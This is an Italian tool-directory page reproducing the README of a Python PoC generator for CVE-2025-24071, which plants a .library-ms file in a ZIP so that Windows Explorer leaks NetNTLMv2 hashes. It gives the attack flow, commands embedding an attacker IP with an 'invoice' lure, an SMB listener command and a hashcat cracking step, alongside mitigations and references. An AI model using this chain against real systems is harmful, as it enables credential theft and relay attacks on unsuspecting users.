Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071 — Generatore PoC Python senza dipendenze per CVE-2025-24071 che crea un file .library-ms malevolo in un ZIP per attivare la divulgazione dell'hash NTLM di Windows Explorer. | Kitploit
Strumenti/GitHubGitHub/bardlaudian/cve-2025-24071
Strumenti di PhishingAttacchi alle PasswordAnalisi delle VulnerabilitàExploitMovimento LateraleRaccolta InformazioniPenetration TestingRed Teaming
GitHubbardlaudian/cve-2025-24071

CVE-2025-24071

Generatore PoC Python senza dipendenze per CVE-2025-24071 che crea un file .library-ms malevolo in un ZIP per attivare la divulgazione dell'hash NTLM di Windows Explorer.

Vedi Repository
12 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24071 — Spoofing di Windows File Explorer / Divulgazione di hash NTLM tramite .library-ms

Python CVE Platform

⚠️ Disclaimer: Questo strumento è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. Utilizzalo solo contro sistemi di tua proprietà o per i quali disponi di esplicita autorizzazione scritta ai test. L'uso non autorizzato è illegale.


Indice

  • Panoramica
  • Dettagli della vulnerabilità
  • Come funziona
  • Requisiti
  • Installazione
  • Utilizzo
  • Esempi
  • Mitigazioni
  • Crediti
  • Riferimenti

Panoramica

Windows File Explorer analizza automaticamente determinati tipi di file non appena compaiono nella visualizzazione di una cartella, senza alcuna interazione da parte dell'utente come un doppio clic. Le versioni interessate non riescono a validare correttamente i file .library-ms, che possono definire un connettore di ricerca puntato a un percorso SMB remoto arbitrario.

Quando Explorer visualizza una cartella contenente un file .library-ms malevolo (ad esempio subito dopo l'estrazione di un archivio ZIP/RAR), tenta silenziosamente di connettersi al percorso UNC controllato dall'attaccante per risolvere la posizione della "libreria". Questo tentativo di connessione SMB trasporta l'hash NetNTLMv2 della vittima, che un attaccante in grado di catturare il traffico sull'host specificato (ad esempio con impacket-smbserver o Responder) può poi tentare di crackare offline o di relayare.

Questo repository contiene una riscrittura minimale e senza dipendenze di un generatore PoC pubblico per questa vulnerabilità: costruisce il file .library-ms malevolo e lo impacchetta in un ZIP, utilizzando esclusivamente la libreria standard di Python.


Dettagli della vulnerabilità


Come funziona

Un file .library-ms è un documento XML che indica a Windows Explorer di visualizzare il contenuto di una posizione remota o locale come una "libreria". Il suo elemento <simpleLocation><url> può puntare a un percorso UNC (\\<host>\<share>).

Nelle versioni interessate, Explorer risolve questa posizione non appena la cartella viene visualizzata — non è richiesto alcun doppio clic o azione esplicita oltre alla presenza del file visibile nella visualizzazione di una cartella (ad esempio, subito dopo l'estrazione di un archivio che lo contiene).

Requisiti dell'attacco

  1. L'attaccante controlla un host raggiungibile dalla vittima (o si trova sulla stessa rete) su cui è in esecuzione un listener SMB (impacket-smbserver, Responder, ecc.).
  2. Viene generato un file .library-ms malevolo, puntato a \\<attacker_ip>\<share>.
  3. Il file viene consegnato alla vittima, tipicamente impacchettato all'interno di un archivio ZIP/RAR (questo repo automatizza quella fase di impacchettamento).
  4. La vittima estrae l'archivio e visualizza la cartella in Explorer — non è necessaria alcuna ulteriore interazione.

Flusso di exploit

root@kitploit:~
1. Start an SMB listener on the attacker machine
2. Generate a .library-ms file pointing to \\<attacker_ip>\<share>
3. Package it into a ZIP archive
4. Deliver the ZIP to the victim (upload feature, email, share, etc.)
5. Victim extracts the ZIP and Explorer renders the folder
6. Explorer resolves the UNC path -> SMB auth attempt -> NetNTLMv2 hash captured
7. Crack the hash offline (hashcat -m 5600) or relay it

Requisiti

  • Python 3.8+ (solo libreria standard — os, sys, argparse, zipfile)

Non sono necessarie dipendenze di terze parti per generare il payload. La cattura dell'hash richiede un listener SMB come Impacket (impacket-smbserver) o Responder sul lato attaccante.


Installazione

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071

Utilizzo

root@kitploit:~
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]

options:
  -n NAME, --name NAME             Output base filename (no extension)
  -i IP, --ip IP                   Attacker IP to embed as the UNC path target
  -s SHARE, --share SHARE          Share name (default: shared)
  -o OUTDIR, --outdir OUTDIR       Output directory (default: current dir)
  -a, --affected-versions          Print the list of affected Windows versions and exit

Esempi

Utilizzo di base

root@kitploit:~
python3 cve_2025_24071.py -n invoice -i 10.10.14.5

Questo produce invoice.zip, contenente invoice.library-ms puntato a \\10.10.14.5\shared.

Avvia il listener prima di consegnare il file

root@kitploit:~
impacket-smbserver shared /tmp/smbshare -smb2support

Nome della share e directory di output personalizzati

root@kitploit:~
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads

Elenca le versioni interessate

root@kitploit:~
python3 cve_2025_24071.py -a

Mitigazioni

  • Applica l'aggiornamento cumulativo di sicurezza di marzo 2025 (o successivo) per la tua versione di Windows.
  • Limita l'SMB in uscita (TCP 445) al perimetro di rete per impedire che gli hash NTLM trapelino verso host esterni.
  • Applica la firma SMB e disabilita NTLM ove possibile in favore di Kerberos.
  • Scansiona gli archivi caricati/estratti alla ricerca di .library-ms e tipi di file simili analizzati automaticamente prima che raggiungano le workstation degli utenti finali.

Crediti

  • Vulnerabilità scoperta e segnalata a Microsoft da: Microsoft (accreditata tramite MSRC; il segnalatore esterno originale non è stato divulgato pubblicamente al momento della stesura)
  • Advisory pubblicata da: Microsoft Security Response Center (MSRC)
  • Concetto del generatore PoC pubblico di riferimento da: ThemeHackers
  • Riscrittura con libreria standard: Bardlaudian — versione senza dipendenze del generatore ZIP/.library-ms, nessuna nuova tecnica di exploit

Riferimenti

  • MSRC — CVE-2025-24071 Security Update Guide
  • NVD — CVE-2025-24071
  • CVE.org Record — CVE-2025-24071
  • GitHub Advisory Database — GHSA-mppc-8qxh-4wjw
Scarica lo strumento
CampoValore
CVECVE-2025-24071
InteressatiWindows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025
TipoEsposizione di informazioni sensibili a un attore non autorizzato (CWE-200)
PrivilegiNessuno (attaccante non autenticato; richiede che la vittima visualizzi/estrai il file)
ImpattoDivulgazione dell'hash NetNTLMv2 → cracking offline o relay NTLM
CVSS7.5 Alto (secondo GitHub Advisory Database) / 6.5 (base MSRC)
PatchAggiornamenti cumulativi del Patch Tuesday di marzo 2025